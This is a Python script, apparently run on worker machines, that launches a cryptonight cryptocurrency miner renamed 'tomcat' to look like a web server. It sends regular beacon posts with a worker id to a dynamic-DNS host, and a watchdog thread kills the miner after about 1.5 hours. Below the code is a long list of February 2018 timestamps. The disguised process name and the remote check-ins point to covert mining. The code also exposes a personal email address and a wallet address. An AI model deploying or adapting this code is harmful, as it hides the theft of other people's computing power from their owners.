import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:09:07.098614
#2018-02-17 16:57:07.040197
#2018-02-17 18:47:07.260876
#2018-02-17 20:35:06.091385
#2018-02-17 22:21:04.659889
#2018-02-18 00:05:08.459429
#2018-02-18 01:57:03.520930
#2018-02-18 03:45:05.511631
#2018-02-18 05:32:06.436333
#2018-02-18 07:24:01.614501
#2018-02-18 09:12:05.644877
#2018-02-18 10:58:05.557003
#2018-02-18 12:45:06.440766
#2018-02-18 14:33:05.155400
#2018-02-18 16:23:05.903223
#2018-02-18 18:13:03.856274
#2018-02-18 19:59:02.142117
#2018-02-18 21:46:01.950697
#2018-02-18 23:36:06.445474
#2018-02-19 01:22:03.379717
#2018-02-19 03:10:06.854293
#2018-02-19 04:55:07.549741
#2018-02-19 06:41:04.904877
#2018-02-19 08:31:07.715319
#2018-02-19 10:20:03.668823
#2018-02-19 12:08:01.524915
#2018-02-19 13:55:01.452077
#2018-02-19 15:45:15.965135
#2018-02-19 17:34:08.367980
#2018-02-19 19:21:03.754667
#2018-02-19 21:08:07.618843
#2018-02-19 22:56:09.744084
#2018-02-20 00:39:02.188562
#2018-02-20 02:27:07.167237
#2018-02-20 04:17:03.410469
#2018-02-20 06:01:05.485596
#2018-02-20 07:45:09.603521
#2018-02-20 09:29:04.179438
#2018-02-20 11:13:05.844062
#2018-02-20 13:01:07.941764
#2018-02-20 14:45:01.820783
#2018-02-20 16:32:02.042275
#2018-02-20 18:20:03.077141
#2018-02-20 20:10:08.557551
#2018-02-20 21:57:05.409148
#2018-02-20 23:39:01.351918
#2018-02-21 01:23:01.947247
#2018-02-21 03:11:07.571204
#2018-02-21 04:59:03.781679
#2018-02-21 06:48:06.455718
#2018-02-21 08:38:05.591530
#2018-02-21 10:23:04.254193
#2018-02-21 12:10:03.604783
#2018-02-21 13:58:08.195223
#2018-02-21 15:44:04.394917
#2018-02-21 17:35:02.238231
#2018-02-21 19:21:10.571520
#2018-02-21 21:11:01.429870
#2018-02-21 22:59:06.995505
#2018-02-22 00:47:01.290006
#2018-02-22 02:35:08.734124
#2018-02-22 04:21:01.579615
#2018-02-22 06:07:07.549699
#2018-02-22 07:52:06.771253
#2018-02-22 09:41:06.829863
#2018-02-22 11:26:07.834998
#2018-02-22 13:13:02.210271
#2018-02-22 15:02:07.028996
#2018-02-22 16:47:08.937460
#2018-02-22 18:36:01.712290
#2018-02-22 20:27:08.427247
#2018-02-22 22:13:07.446844
#2018-02-23 00:00:10.655202
#2018-02-23 01:49:04.811557
#2018-02-23 03:39:07.539052
#2018-02-23 05:24:07.878467
#2018-02-23 07:10:08.136867
#2018-02-23 09:16:07.349180
#2018-02-23 11:21:01.275465
#2018-02-23 13:11:08.330564
#2018-02-23 14:57:02.084935
#2018-02-23 16:45:09.294649
#2018-02-23 18:32:06.670573
#2018-02-23 20:20:09.617612
#2018-02-23 22:07:05.576150
#2018-02-23 23:55:07.505555
#2018-02-24 01:45:07.060646
#2018-02-24 03:37:04.965483
#2018-02-24 05:21:04.052067
#2018-02-24 07:09:01.358371
#2018-02-24 08:56:05.113099
#2018-02-24 10:58:07.147820
#2018-02-24 12:47:03.622311
#2018-02-24 14:36:01.998300
#2018-02-24 16:22:02.188582
#2018-02-24 18:16:03.437359
#2018-02-24 20:02:07.227597
#2018-02-24 21:45:08.179033
#2018-02-25 00:42:05.852288
#2018-02-25 04:37:05.753778
#2018-02-25 08:03:06.450934